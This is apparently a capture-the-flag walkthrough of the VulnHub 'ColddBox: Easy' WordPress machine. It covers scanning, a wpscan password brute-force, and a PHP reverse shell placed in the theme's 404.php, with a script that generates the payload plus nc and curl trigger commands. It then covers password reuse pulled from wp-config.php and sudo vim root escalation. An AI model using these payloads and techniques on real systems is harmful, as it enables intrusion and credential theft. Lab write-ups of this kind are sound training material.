COLDDBOX: EASY WALKTHROUGH
Hi everyone. This VM was created by C0ldd and is hosted on VulnHub. It is a WordPress machine rated easy.
It runs on VirtualBox, and works better on VirtualBox than on VMware.
You can download the VM from this link:
https://mega.nz/file/VldHiIgA#4nRI2LPZs_x48_-ryCkPvL6Em2lQTSJEKvoReieDMec
So let's start. First, as usual, we find the target on the host-only network with netdiscover:
netdiscover -i vboxnet0
Network Scanning
Then we run a full port scan; this is what I got.
nmap -v -sV -p- -O 192.168.56.105
Here -v is verbose mode, -sV grabs service version info, -p- scans all 65535 ports and -O enables OS detection.
Enumeration
As usual, we expected port 80 to be our way in, so we enumerated it as thoroughly as possible. We visit the page...
We use nikto to look for weak HTTP configuration and interesting files, and it reports a "wordpress" entry:
nikto -h http://192.168.56.105
Nikto lists several directories, so we visit them one by one.
At http://192.168.56.105/hidden we find three users.
Let's run wpscan to enumerate all WordPress users:
wpscan --url http://192.168.56.105 -e u
Then we go to another directory, http://192.168.56.105/wp-login.php, and find the login page.
Again we use wpscan, this time to brute-force the c0ldd user's password against rockyou:
wpscan --url http://192.168.56.105 -U c0ldd -P /usr/share/wordlists/rockyou.txt
After about a minute we have c0ldd's password. Let's log into the WordPress panel and upload our reverse shell.
We log in as c0ldd and land in the WordPress dashboard.
It's time to get a reverse shell from WordPress.
Go to Appearance > Editor.
Click "Select theme to edit", choose the "Twenty Fifteen" theme and click Select.
Now select "404 Template (404.php)"
and replace the contents of 404.php with our payload. The edited file is served directly at:
URL: http://192.168.56.105/wp-content/themes/twentyfifteen/404.php
Start the reverse shell listener on the attacker machine with nc first, then request that URL to trigger the payload and receive the shell.
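As an added example (not from the original walkthrough), the script below generates the PHP body to paste into 404.php, parameterised by the attacker's IP and listener port. The values 192.168.56.1 and 4444 are assumptions for a VirtualBox host-only network; the target URL is the one given above.

```shell
#!/bin/sh
# Added example: generate the PHP reverse shell to paste into 404.php.
# Usage: make_404_payload <attacker_ip> <attacker_port>
# The PHP connects back to the attacker and attaches an interactive /bin/sh
# to the socket (stdin, stdout and stderr all travel over the connection).
make_404_payload() {
    lhost="$1"
    lport="$2"
    cat <<EOF
<?php
// Reverse shell: connect back to $lhost:$lport and hand the socket to /bin/sh.
\$sock = fsockopen("$lhost", $lport);
if (\$sock === false) {
    exit(1);
}
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
EOF
}

# Attacker IP/port are assumptions for a VirtualBox host-only network.
LHOST="192.168.56.1"
LPORT="4444"
TARGET_404="http://192.168.56.105/wp-content/themes/twentyfifteen/404.php"

# Print the payload; paste it into Appearance > Editor > 404.php and save.
make_404_payload "$LHOST" "$LPORT"

# Then, in two terminals on the attacker machine:
#   1. nc -lvnp 4444            (listener, started before the request)
#   2. curl -s "$TARGET_404"    (triggers the payload and pops the shell)
```

Start the listener before requesting the URL. proc_close blocks until the shell exits, so the curl request hangs while the shell is alive; that is expected.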
The shell we get has no TTY,
so we upgrade it with:
Command: python3 -c 'import pty; pty.spawn("/bin/bash")'
First we check /etc/passwd to see how many users there are: only one, c0ldd. So we go to /home/c0ldd, where we find a text file that we do not have permission to read. Next we look for c0ldd's password. Running cat /var/www/html/wp-config.php shows the WordPress database password, and since the same password is often reused for the local account, we try it.
The password is cybersecurity, and it works for the c0ldd user.
Command: su c0ldd
Logged in as c0ldd, we check our identity and groups:
c0ldd@ColddBox-Easy:/var/www/html$ id
uid=1000(c0ldd) gid=1000(c0ldd) grupos=1000(c0ldd),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
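The three checks above (who has a login shell in /etc/passwd, what credentials wp-config.php holds, and which groups the id output lists) are the routine post-exploitation triage on a box like this. As an added example, not part of the original walkthrough, the helpers below automate them; each reads stdin so it can be run against the live files, and the passwd and wp-config samples are constructed for the demonstration (only the id line is the one printed above). The lxd membership visible there is a well-known escalation path in its own right, not pursued in this walkthrough.

```shell
#!/bin/sh
# Added example: post-exploitation triage helpers for the steps above.
# Each function reads its input on stdin, so it works on a live box
# (e.g. interactive_users < /etc/passwd) and on the constructed samples below.

# Interactive accounts: UID >= 1000 (skipping the 'nobody' UID 65534) with a real login shell.
interactive_users() {
    awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1 }'
}

# Value of a define('KEY', 'value') line in wp-config.php; $1 is the key,
# e.g. DB_USER or DB_PASSWORD. Handles single or double quotes and optional spaces.
wp_config_value() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$1['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p"
}

# Group names from an `id` line, one per line. Matches both "groups=" and the
# Spanish "grupos=" printed by this machine.
id_groups() {
    sed -n 's/.*gr[a-z]*=//p' | tr ',' '\n' | sed 's/^[0-9]*(//; s/)$//'
}

# --- Constructed sample inputs (not copied from the target) ---
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
c0ldd:x:1000:1000:c0ldd,,,:/home/c0ldd:/bin/bash'

SAMPLE_WP_CONFIG="<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cret_pw' );
define( 'DB_HOST', 'localhost' );"

# This id line is the one shown in the walkthrough.
SAMPLE_ID='uid=1000(c0ldd) gid=1000(c0ldd) grupos=1000(c0ldd),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)'

echo "Interactive users:"
printf '%s\n' "$SAMPLE_PASSWD" | interactive_users
echo "DB credentials from wp-config.php:"
printf '%s\n' "$SAMPLE_WP_CONFIG" | wp_config_value DB_USER
printf '%s\n' "$SAMPLE_WP_CONFIG" | wp_config_value DB_PASSWORD
echo "Groups (adm, lxd, docker and sudo are the ones worth a second look):"
printf '%s\n' "$SAMPLE_ID" | id_groups
```

On the target, replace the samples with `interactive_users < /etc/passwd`, `wp_config_value DB_PASSWORD < /var/www/html/wp-config.php` and `id | id_groups`; the extracted database password is exactly the value to try with su, as the walkthrough does.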
Privilege Escalation
We run sudo -l to check our current user's sudo permissions: c0ldd can run three binaries with sudo. Let's use one of them to escalate.
So I go to GTFOBins and look up vim; its sudo entry spawns a shell from inside vim, which roots the machine.
Finally, we are done.